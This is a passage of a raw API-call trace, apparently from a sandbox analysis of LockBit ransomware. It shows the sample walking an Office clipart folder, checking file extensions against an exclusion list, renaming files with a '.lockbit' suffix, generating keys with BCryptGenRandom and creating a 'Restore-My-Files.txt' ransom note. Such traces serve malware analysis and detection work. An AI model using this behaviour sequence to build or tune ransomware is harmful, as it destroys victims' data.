lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.010] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.010] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.011] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.011] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.011] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.011] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.044] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00369_.WMF") returned 1 [0114.044] lstrcmpiW (lpString1="ntldr", lpString2="FD00369_.WMF") returned 1 [0114.044] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00369_.WMF") returned 1 [0114.044] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00369_.WMF") returned -1 [0114.044] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00369_.WMF") returned -1 [0114.044] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00369_.WMF") returned 1 [0114.044] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00369_.WMF") returned 1 [0114.044] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.044] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned=".WMF" [0114.044] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.044] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.044] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.044] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.044] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.044] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.044] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.045] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.045] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF.lockbit") returned 72 [0114.045] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00369_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0114.046] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.046] malloc (_Size=0x40068) returned 0x1ff1e60 [0114.046] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8552) returned 1 [0114.046] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.047] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0114.047] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.047] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0114.048] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.049] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.049] malloc (_Size=0xa6) returned 0x77d7a8 [0114.049] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.050] free (_Block=0x77d7a8) [0114.050] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.050] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.050] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.050] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcdfcc00, ftCreationTime.dwHighDateTime=0x1bd4b1a, ftLastAccessTime.dwLowDateTime=0x60c23530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfcdfcc00, ftLastWriteTime.dwHighDateTime=0x1bd4b1a, nFileSizeHigh=0x0, nFileSizeLow=0x20e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00382_.WMF", cAlternateFileName="")) returned 1 [0114.050] lstrcmpiW (lpString1=".", lpString2="FD00382_.WMF") returned -1 [0114.050] lstrcmpiW (lpString1="..", lpString2="FD00382_.WMF") returned -1 [0114.050] PathFindExtensionW (pszPath="FD00382_.WMF") returned=".WMF" [0114.050] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.050] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.051] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.052] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.052] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00382_.WMF") returned 1 [0114.052] lstrcmpiW (lpString1="ntldr", lpString2="FD00382_.WMF") returned 1 [0114.052] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00382_.WMF") returned 1 [0114.052] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00382_.WMF") returned -1 [0114.052] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00382_.WMF") returned -1 [0114.052] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00382_.WMF") returned 1 [0114.052] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00382_.WMF") returned 1 [0114.053] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.053] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned=".WMF" [0114.053] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.053] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.053] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.054] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.054] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.054] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.054] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.054] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.054] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF.lockbit") returned 72 [0114.054] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00382_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0114.054] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.054] malloc (_Size=0x40068) returned 0x3e70008 [0114.055] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=8424) returned 1 [0114.055] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.055] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0114.055] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.056] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0114.056] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0114.061] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.061] malloc (_Size=0xa6) returned 0x77d7a8 [0114.061] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.062] free (_Block=0x77d7a8) [0114.062] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.062] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.062] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.062] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae630b00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x5226a510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xae630b00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x2a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00397_.WMF", cAlternateFileName="")) returned 1 [0114.062] lstrcmpiW (lpString1=".", lpString2="FD00397_.WMF") returned -1 [0114.062] lstrcmpiW (lpString1="..", lpString2="FD00397_.WMF") returned -1 [0114.062] PathFindExtensionW (pszPath="FD00397_.WMF") returned=".WMF" [0114.062] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.062] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.062] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.062] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.062] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.062] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.063] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.063] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.064] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00397_.WMF") returned 1 [0114.064] lstrcmpiW (lpString1="ntldr", lpString2="FD00397_.WMF") returned 1 [0114.064] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00397_.WMF") returned 1 [0114.064] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00397_.WMF") returned -1 [0114.064] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00397_.WMF") returned -1 [0114.064] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00397_.WMF") returned 1 [0114.064] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00397_.WMF") returned 1 [0114.064] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.064] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned=".WMF" [0114.064] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.065] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.065] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.066] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.066] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.066] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.066] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.066] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF.lockbit") returned 72 [0114.066] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00397_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0114.066] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.066] malloc (_Size=0x40068) returned 0x3ef0008 [0114.066] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=10816) returned 1 [0114.066] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.067] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0114.067] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.067] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 